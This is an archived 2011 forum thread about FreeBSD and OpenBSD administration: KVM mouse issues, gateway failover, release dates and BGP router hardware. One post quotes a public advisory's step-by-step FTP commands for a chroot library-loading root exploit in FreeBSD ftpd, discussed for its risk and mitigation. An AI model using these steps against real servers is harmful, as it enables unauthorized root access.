Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

• Locked thread
falz
Jan 29, 2005

01100110 01100001 01101100 01111010
If you still need anything:
* http://falz.net/static/sa/coretemp.ko-i386
* http://falz.net/static/sa/coretemp.ko-amd64

Adbot
ADBOT LOVES YOU

BlackMK4
Aug 23, 2006

wat.
Megamarm
Thank you :)

conntrack
Aug 8, 2003

by angerbeet
For you swedish openbsd nerds there will be an event this saturday.

http://www.slackathon.se:2011/

The talks last year were really interesting and im sure this year will be awesome.

Looking forward to Henning, Ariane and the PPC talk. There is no entrance fee so you could go just to fawn over the openbsd rock stars :allears:

DeciusMagnus
Mar 16, 2004

Seven times five
They were livin' creatures
Watch 'em come to life
Right before your eyes
I'm having difficulty finding any solution to my problem online. I have my Windows and FreeBSD box hooked up to a USB KVM and when I switch from FreeBSD to Windows the mouse no longer works on X11. The kernel reconnects the mouse and hald sees the mouse reconnect again. I can use the mouse in the console, but when switching back to the FreeBSD box, X11 can't detect the mouse again. Nothing in the logs are obvious. Both hald and dbus are running and in the rc.conf and restarting them doesn't fix it consistently as a workaround.
pre:
FreeBSD gamet 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

X Protocol Version 11, Revision 0
Build Operating System: FreeBSD 8.2-RELEASE amd64 
Current Operating System: FreeBSD gamet 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
Build Date: 04 March 2011  01:41:38PM

feld
Feb 11, 2008

Out of nowhere its.....

Feldman

Build xorg without HAL support and see if the problem goes away. HAL needs to die a fiery death. You just can't hotplug a mouse after X has started... but you could unplug/replug after X is running like your KVM seems to be doing and it would be just fine.

conntrack
Aug 8, 2003

by angerbeet
shouldnt the kvm do it's thing and not make it look like device removal on change?

DeciusMagnus
Mar 16, 2004

Seven times five
They were livin' creatures
Watch 'em come to life
Right before your eyes
Apparently I don't have a very good KVM because when a machine is booting up, the KVM needs to active on that machine or certain things (like display settings) won't be right. Getting a new KVM may solve many issues, but I still don't understand why Xorg can reattach a USB keyboard but not a USB mouse.

Bob Morales
Aug 18, 2006

Just wear the fucking mask, Bob

I don't care how many people I probably infected with COVID-19 while refusing to wear a mask, my comfort is far more important than the health and safety of everyone around me!

http://www.openbsd.org/orders.html

You can pre-order OpenBSD 5.0, it should be released November 1st

SamDabbers
May 26, 2003

Bob Morales posted:

http://www.openbsd.org/orders.html

You can pre-order OpenBSD 5.0, it should be released November 1st

Ordered my copy. Best free software I've ever paid for.

xgalaxy
Jan 27, 2004
i write code

IanMalcolm posted:

I cannot understand what is going on. The couchpotato script is a copy-paste from the sickbeard script. Couchpotato starts fine during boot or manually later on, but neither SickBeard nor SABnzbd+ start, even manually. If I run the command stated on the rc script, though, it starts fine (but I do run it as root, since the _sabnzbd user isn't allowed to log in).

Edit: Well, I changed the user to root and the group to wheel on my /etc/rc.conf and now it starts fine. Not the best idea, I suppose, though, so that still needs fixing.

Sure its not a PATH issue? I have problems with sabnzbd starting properly because it can't find /usr/local/bin. Its ugly, but you can fix this by exporting PATH from rc.conf.

Masked Pumpkin
May 10, 2008
So I've looked everywhere, and I'm stuck. I've got a network with two gateways on it, .250 and .252. My Ubuntu server, on .1, uses .250 as a gateway as it's faster. I'd like the server to run a regular ping test on that router, and then fail over to .252 when .250 goes down, returning to .250 when it picks up again.

Under OpenBSD, I've always used ifstated, but Ubuntu doesn't seem to allow for that at all, so short of trying to compile it myself, is anyone aware of any better options? The server only has one network interface, so simply using different metrics in routing is not an option.

I feel like I'm missing something very obvious, what is it?

EvilMoFo
Jan 1, 2006

Masked Pumpkin posted:

I feel like I'm missing something very obvious, what is it?
Run OpenBSD? I mean, if it worked in the past for what you seek, that is the obvious option.

Masked Pumpkin
May 10, 2008

EvilMoFo posted:

Run OpenBSD? I mean, if it worked in the past for what you seek, that is the obvious option.

I am a big fan of OpenBSD, but opted to give Ubuntu server a try after being as impressed as I was with the client side. I'll need to keep using it, and not having fail-over isn't a deal breaker (or something I couldn't hack together some kind of shell script for) but it does seem like a pretty obvious kind of thing to have.

Ninja Rope
Oct 22, 2005

Wee.
Can't you cron something like:

ping -c 3 4.2.2.2 || route del default gw && route add default gw x.x.x.252

Obviously you should check the flags to all of that and include some way of failing back if the old gateway comes back up, but you get the idea. Shell script + ping + route command.

Edit: Or build ifstated, whatever that is, or run a routing protocol between you and the gateways, or...

Masked Pumpkin
May 10, 2008

Ninja Rope posted:

Can't you cron something like:

ping -c 3 4.2.2.2 || route del default gw && route add default gw x.x.x.252

Obviously you should check the flags to all of that and include some way of failing back if the old gateway comes back up, but you get the idea. Shell script + ping + route command.

Edit: Or build ifstated, whatever that is, or run a routing protocol between you and the gateways, or...

That's pretty much what I plan on doing - some small and dirty shell script to fire off every few minutes or so. Ifstated I really liked because it would check on whatever you asked, and was scriptable - I'm tempted to try building it anyway, am sure others will have a use for it.

falz
Jan 29, 2005

Masked Pumpkin posted:

The server only has one network interface, so simply using different metrics in routing is not an option.
Having one interface shouldn't matter. Your script should probably just set the metric on the route in question, not completely remove it.

Matt Zerella
Oct 7, 2002

Norris'es are back baby. It's good again. Awoouu (fox Howl)
So is this just news to me?

Looks like FreeBSD 9.0 will be out 11/11/2011

http://wiki.freebsd.org/Releng/9.0TODO

complex
Sep 16, 2003

LamoTheKid posted:

So is this just news to me?

Looks like FreeBSD 9.0 will be out 11/11/2011

http://wiki.freebsd.org/Releng/9.0TODO

Highly unlikely. There haven't even been any RCs released.

SmirkingJack
Nov 27, 2002

complex posted:

Highly unlikely. There haven't even been any RCs released.

Have they ever come close to hitting their deadlines?

complex
Sep 16, 2003

SmirkingJack posted:

Have they ever come close to hitting their deadlines?

To my recollection, no. But, hey you have to shoot for something.

RC1 is out! http://www.freebsd.org/news/newsflash.html#event20111023:01 Help test it, make it better, make it to RELEASE faster.

Mao Zedong Thot
Oct 16, 2008

complex posted:

To my recollection, no. But, hey you have to shoot for something.

RC1 is out! http://www.freebsd.org/news/newsflash.html#event20111023:01 Help test it, make it better, make it to RELEASE faster.

I'm running a ZFS boot system, is upgrading going to end up causing problems or is everything likely to go well?

feld
Feb 11, 2008

Out of nowhere its.....

Feldman

polpotpotpotpotpot posted:

I'm running a ZFS boot system, is upgrading going to end up causing problems or is everything likely to go well?

I upgraded one for a friend not too long ago from 8.0 to 8-stable. I don't know how I'd do it from 8 to 9 considering you can't do the kernel AND world at the same time without causing the running system to break. The steps literally were to install the kernel and world, write the NEW gptzfsloader to the drives, and then reboot with your fingers crossed and do some cleanup.

tl;dr GOOD LUCK! (this is why I've been waiting for the installer to fully support it first)

Ginger Beer Belly
Aug 18, 2010

Grimey Drawer

falz posted:

Curious of anyone's experience using OpenBSD as a router, specifically with OpenBGPD and OpenOSPFD? In a lab VM environment I'm testing full BGP feeds and convergence times, things are much faster than on the Cisco hardware I have to test on due to Cisco general purpose CPU speeds being slow. Target hardware to be used would be generic Dell servers with Broadcom and/or Intel NICs (snip)

I'm going to take your advice and re-purpose an old Dell PowerEdge 2650 (dual 2.8Ghz Xeon's). I do need to add an additional gig-E as I want to have 1 connection to the upstream it will border, and 1 connection to each core router. The upstream I'm going to have it border sells us 400Mbps.

How does your hardware compare to mine, and what kind of forwarding performance are you seeing, and what sort of bottleneck indicators are you watching?

Also, are you using a multi-processor Dell, and are you using the bsd.mp kernel?

I assume that OpenBGPD still doesn't support confederations? If so, it isn't fatal, I just have a nice and scary maintenance window to collapse my network back into one homogeneous AS.

Bob Morales
Aug 18, 2006

Just wear the fucking mask, Bob

I don't care how many people I probably infected with COVID-19 while refusing to wear a mask, my comfort is far more important than the health and safety of everyone around me!

yarrmatey posted:

I'm going to take your advice and re-purpose an old Dell PowerEdge 2650 (dual 2.8Ghz Xeon's).

In applications where you don't need the extra hard drive bays that a big server like that provides, you're almost always better off using a new Dell R200/R300. They start out with dual gigabit NICs, but you may need to upgrade to Intel because some older versions of FreeBSD have trouble supporting Broadcom out of the box.

Aother huge benefit is that the new processors are many times faster than the old Xeons. Even the now-discontinued Core2Duo models. We moved some staging web and database servers over from Dell 1850's with Dual Xeons over to some 2-year old R300's (2.4GHz and they are about 4 times as fast as they were on the old Dual-Xeon setup.

Last, they only take up 1U of server space instead of 4U (or a tower) and they don't take anywhere near the power. I think the older Xeon's are like 130-160W each, and the newer C2D's are only about 60. Not sure if the newer Xeons or Core i3's are even lower.

SamDabbers
May 26, 2003

I recently installed a pair of R210s with 4 port Intel GigE cards running pfSense 2.0-RELEASE/OpenOSPFD/OpenBGPD to replace my company's craptacular Sonicwall cluster. I had to tweak the BIOS settings to get it installed (known issue; see the pfSense forums) but they have been rock-solid for about a month now. I would rather have gone straight OpenBSD for the latest pf improvements, but my boss wanted a GUI.

We're only pushing about 40Mbps average across all connections, but the CPU doesn't go over 2% even during bursts. Highly recommended!

Matt Zerella
Oct 7, 2002

Norris'es are back baby. It's good again. Awoouu (fox Howl)
FreeBSD 9.0-RC2 is out.

http://www.freebsd.org/news/newsflash.html#event20111117:01

Only Shallow
Nov 12, 2005

show
Heads up, looks like there's a 0day in FreeBSD ftpd:

http://seclists.org/fulldisclosure/2011/Nov/452

quote:

* tested against: FreeBSD-8.2,8.1,7.2,7.1 i386;
* FreeBSD-6.3 i386
* FreeBSD-5.5,5.2 i386
* FreeBSD-8.2 amd64
* FreeBSD-7.3, 7.0 amd64
* FreeBSD-6.4, 6.2 amd64

Bluecobra
Sep 11, 2001

The Future's So Bright I Gotta Wear Shades

Only Shallow posted:

I looked that the source code and from what I can tell this isn't that bad of an exploit if you have already taken reasonable precautions to secure ftp. It looks like you have first have ftp running in a chrooted environment, be able to log into the ftp server with a valid username/password, then be able to make directories/upload files and use the quote command.

code:
The ftpd will look for a file in /etc/nsswitch.conf, if this file exists
it will load various library files (.so) from /lib and /usr/lib such as
"/lib/nss_compat.so.1".
In a chroot'ed environment this is a remote and local root exploit, because
the lookup for the libraries is INSIDE THE chroot!

Exploit:

ftp <target>
mkdir etc
put /etc/nsswitch.conf etc/nsswitch.conf
mkdir lib
put beast.so.1.0 lib/nss_compat.so.1
quote site chmod 777 nonexistant
quote stat .
quit

<ROOT SHELL>

Only Shallow
Nov 12, 2005

show
And again :v:

Nam Taf
Jun 25, 2005

I am Fat Man, hear me roar!

This is why I'm glad not to work in IT.

falz
Jan 29, 2005

If you actually use telnet to admin your box your passwords would have been sniffed anyway.

feld
Feb 11, 2008

Out of nowhere its.....

Feldman

Only Shallow posted:

This was discussed on the FullDisclosure mailing list like 2 weeks ago...

falz
Jan 29, 2005

Good thing that quote was posted over 3 weeks ago! :)

feld
Feb 11, 2008

Out of nowhere its.....

Feldman

Hah, read the wrong date. :downs::hf::black101:

SamDabbers
May 26, 2003

Only Shallow posted:

That ftpd bug is actually a chroot(2) bug and could theoretically be exploited through a different network daemon.

falz posted:

If you actually use telnet to admin your box your passwords would have been sniffed anyway.
This.

telnet -> ssh
ftp -> sftp

SamDabbers fucked around with this message at 20:40 on Dec 24, 2011

feld
Feb 11, 2008

Out of nowhere its.....

Feldman

SamDabbers posted:

ftp -> sftp

On that note: Please tell me of an awesome piece of software that will let us create virtual users for sftp so they don't have real system accounts? On Windows there's an awesome ftp daemon we use called Xlight. So yeah, our Windows webhosting clients get SFTP access but our BSD ones don't. Ironic.

edit: and not proftpd's sftp modules. That would work if it wasn't banned from our company because of the giant gaping security holes in that software stack.

feld fucked around with this message at 18:24 on Dec 26, 2011

SamDabbers
May 26, 2003

It's not virtual users, but I do this to provide SFTP-only access on a system.

pseudonordic
Aug 31, 2003

The Jack of All Trades

SamDabbers posted:

It's not virtual users, but I do this to provide SFTP-only access on a system.

I've got this setup on a server as well. Took me a while to get it ironed out but it works well.

falz
Jan 29, 2005

Looks like 9.0 RELEASE was tagged in CVS so I decided to upgrade to it. All good so far, ipv6 config in rc.conf changed slightly but no big deal.

* What's New
* What's cooking for FreeBSD 9

Adbot
ADBOT LOVES YOU

text editor
Jan 8, 2007

falz posted:

Looks like 9.0 RELEASE was tagged in CVS so I decided to upgrade to it. All good so far, ipv6 config in rc.conf changed slightly but no big deal.

* What's New
* What's cooking for FreeBSD 9

Right on schedule, I see.

Any word on when the ISOs will be pushed to mirrors?

• Locked thread